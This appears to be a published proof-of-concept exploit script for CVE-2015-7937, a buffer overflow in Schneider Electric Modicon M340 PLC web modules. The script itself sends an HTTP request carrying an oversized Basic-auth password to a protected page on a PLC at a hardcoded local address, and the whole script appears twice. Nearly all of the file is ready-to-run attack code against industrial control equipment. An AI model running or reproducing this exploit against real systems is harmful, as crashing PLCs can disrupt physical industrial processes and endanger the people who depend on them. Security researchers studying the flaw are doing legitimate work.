ssdemajia/poc.py

## poc.py
# Exploit Title: Schneider Electric Modicon M340 Buffer Overflow Vulnerability
# Google Dork: [if applicable]
# Date: 2020/5/21
# Exploit Author: ssdemajia
# Vendor Homepage: 	http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2015-344-01
# Version: BMXNOC0401               December 15, 2015,
#          BMXNOE0100 (H)          December 15, 2015,
#          BMXNOE0110 (H)          December 15, 2015,
#          BMXNOR0200 (H)          January 16, 2016,
#          BMXP342020                  January 16, 2016,
#          BMXP3420302                January 16, 2016, and
#          BMXPRA0100                 January 16, 2016.
# Tested on: Windows
# CVE : CVE-2015-7937
import requests
from requests.auth import HTTPBasicAuth
ip = '192.168.1.172'  # this is the schneider PLC's ip address.
url = 'http://%s/secure/system/globaldata.htm' % ip
resp = requests.get(url, auth=HTTPBasicAuth('USER', 'pass'*60))
print(resp.status_code)
	# Exploit Title: Schneider Electric Modicon M340 Buffer Overflow Vulnerability
	# Google Dork: [if applicable]
	# Date: 2020/5/21
	# Exploit Author: ssdemajia
	# Vendor Homepage: http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2015-344-01
	# Version: BMXNOC0401 December 15, 2015,
	# BMXNOE0100 (H) December 15, 2015,
	# BMXNOE0110 (H) December 15, 2015,
	# BMXNOR0200 (H) January 16, 2016,
	# BMXP342020 January 16, 2016,
	# BMXP3420302 January 16, 2016, and
	# BMXPRA0100 January 16, 2016.
	# Tested on: Windows
	# CVE : CVE-2015-7937
	import requests
	from requests.auth import HTTPBasicAuth
	ip = '192.168.1.172' # this is the schneider PLC's ip address.
	url = 'http://%s/secure/system/globaldata.htm' % ip
	resp = requests.get(url, auth=HTTPBasicAuth('USER', 'pass'*60))
	print(resp.status_code)